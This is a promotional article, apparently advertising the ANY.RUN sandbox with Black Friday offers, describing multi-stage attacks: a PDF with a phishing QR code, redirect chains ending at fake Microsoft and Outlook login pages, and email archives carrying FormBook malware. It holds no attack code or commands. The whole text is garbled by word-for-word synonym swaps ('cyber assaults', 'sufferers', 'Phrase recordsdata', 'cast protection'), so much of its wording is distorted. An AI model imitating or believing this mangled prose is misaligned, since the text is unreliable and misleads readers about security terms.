Multi-stage cyber assaults, characterised by means of their advanced execution chains, are designed to keep away from detection and trick sufferers right into a false sense of safety. Figuring out how they perform is step one to development a cast protection technique towards them. Let’s read about real-world examples of one of the most maximum commonplace multi-stage assault situations which can be energetic at this time.
URLs and Different Embedded Content material in Paperwork
Attackers incessantly cover malicious hyperlinks inside apparently reliable paperwork, comparable to PDFs or Phrase recordsdata. Upon opening the report and clicking the embedded hyperlink, customers are directed to a malicious website online. Those websites steadily make use of misleading ways to get the sufferer to obtain malware onto their laptop or proportion their passwords.
Any other common form of embedded content material is QR codes. Attackers hide malicious URLs inside QR codes and insert them into paperwork. This technique forces customers to show to their cell gadgets to scan the code, which then directs them to phishing websites. Those websites usually request login credentials, that are in an instant stolen by means of the attackers upon access.
Instance: PDF Record with a QR Code
To reveal how an ordinary assault unfolds, let’s use the ANY.RUN Sandbox, which gives a protected digital surroundings for finding out malicious recordsdata and URLs. Due to its interactivity, this cloud-based carrier permits us to interact with the machine similar to on a normal laptop.
Stand up to a few ANY.RUN licenses as a present with a Black Friday be offering→
To simplify our research, we’re going to permit the Automatic Interactivity characteristic that may carry out all of the consumer movements had to cause assault or pattern execution robotically.
 |
| Phishing PDF with malicious QR code opened within the ANY.RUN sandbox |
Believe this sandbox consultation, which includes a malicious .pdf record that accommodates a QR code. With automation switched on, the carrier extracts the URL throughout the code and opens it within the browser on its own.
 |
| The general phishing web page the place sufferers are presented to proportion their credentials |
After a couple of redirects, the assault takes us to the general phishing web page designed to imitate a Microsoft website. It’s managed by means of danger actors and configured to thieve customers’ login and password knowledge, once it’s entered.
 |
| Suricata IDS rule recognized a phishing area chain right through research |
The sandbox makes it imaginable to look at all of the community job happening right through the assault and notice prompted Suricata IDS laws
After finishing the research, the ANY.RUN sandbox supplies a conclusive “malicious job” verdict and generates a file at the danger that still features a checklist of IOCs.
Multi-stage Redirects
Multi-stage redirects contain a series of URLs that transfer customers thru more than one websites, in the long run resulting in a malicious vacation spot. Attackers steadily make the most of relied on domain names, comparable to Google’s or common social media platforms like TikTok, to make the redirects seem reliable. This technique complicates the detection of the general malicious URL by means of safety equipment.
Some redirect phases might come with CAPTCHA demanding situations to forestall automatic answers and filters from having access to malicious content material. Attackers may additionally incorporate scripts that take a look at for the consumer’s IP cope with. If a hosting-based cope with, repeatedly utilized by safety answers, is detected, the assault chain will get interrupted and the consumer is redirected to a sound website online, fighting get entry to to the phishing web page.
Instance: Chain of Hyperlinks Resulting in a Phishing Web page
Here’s a sandbox consultation appearing all the chain of assault ranging from a apparently reliable TikTok hyperlink.
 |
| TikTok URL containing a redirect to a Google area |
But, a better glance finds how the overall URL comprises a redirect to a sound google area.
 |
| ANY.RUN robotically solves the CAPTCHA shifting directly to the following degree of the assault |
From there, the assault strikes directly to some other website with a redirect after which to the general phishing web page, which is, on the other hand, secure with a CAPTCHA problem.
 |
| Faux Outlook web page meant for stealing consumer knowledge |
Due to complicated content material research, the sandbox robotically solves this CAPTCHA, permitting us to look at the pretend web page designed to thieve sufferers’ credentials.
E mail Attachments
E mail attachments proceed to be a prevalent vector for multi-stage assaults. Previously, attackers incessantly despatched emails with Administrative center paperwork containing malicious macros.
Recently, the focal point has shifted to archives that come with payloads and scripts. Archives supply a simple and efficient approach for danger actors to hide malicious executables from safety mechanisms and building up the trustworthiness of the recordsdata.
Instance: E mail Attachment with Formbook Malware
On this sandbox consultation, we will be able to see a phishing e mail that accommodates a .zip attachment. The carrier robotically opens the archive, which has a number of recordsdata inside of.
 |
| Phishing e mail with an archive |
With Sensible Content material Research, the carrier identifies the principle payload and launches it, which initiates the execution chain and permits us to look how the malware behaves on a reside machine.
 |
| Suricata IDS rule used for detecting FormBook’s connection to its C2 |
The sandbox detects FormBook and logs all of its community and machine actions, in addition to offering an in depth danger file.
Get Your Black Friday Deal from ANY.RUN
Analyze suspicious emails, recordsdata, and URLs within the ANY.RUN sandbox to temporarily determine cyber assaults. With Automatic Interactivity, the carrier can carry out all of the essential research steps by itself, saving you time and presenting you simplest with crucial insights into the danger to hand.
 |
| Black Friday be offering from ANY.RUN |
ANY.RUN is recently providing Black Friday offers. Get yours earlier than December 8:
- For particular person customers: 2 licences for the cost of 1.
- For groups: As much as 3 licences + annual fundamental plan for Danger Intelligence Look up, ANY.RUN’s searchable database of the most recent danger knowledge;
See all gives and take a look at the carrier with a loose trial these days →
Conclusion
Multi-stage assaults are a vital danger to organizations and folks alike. Probably the most maximum commonplace assault situations come with URLs and embeds in paperwork, QR codes, multi-stage redirects, e mail attachments, and archived payloads. Through examining those with equipment like ANY.RUN’s Interactive sandbox, we will be able to higher protect our infrastructure.